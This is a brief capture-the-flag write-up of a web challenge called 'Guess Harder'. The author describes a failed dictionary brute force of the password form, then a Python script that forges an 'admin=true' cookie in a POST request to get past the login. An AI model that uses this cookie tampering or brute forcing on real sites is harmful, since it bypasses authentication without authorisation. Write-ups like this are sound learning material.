So there's no way for anybody to play around with WEB100 "Guess Harder" after the fact since the challenge web server is shut down. The challenge provided an IP address - http://128.238.66.215 - which showed a short message to the effect of "HA! Bet you can't guess my password.", included a text box, and a submit button. When you guess wrong, the page just recycles.

Admittedly, I did this one the hard way at first by scripting a brute force routine with Python that cycled through all the entries of password dictionary. That thing ran for a long time and produced nothing so I finally opened up WireShark to take a peak. Lo and behold, within the HTTP header was a field COOKIE: admin=false. Could it be that easy?

 
import httplib, urllib
params = urllib.urlencode({'password' : 'password'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": "admin=true\r\n"}
conn = httplib.HTTPConnection("128.238.66.225:80")
conn.request("POST", "/", params, headers)
response = conn.getresponse()
print response.status, response.reason, response.read()
conn.close()

Yup. Just telling the server admin=true in the cookie field made it accept the entry and it provided the necessary flag.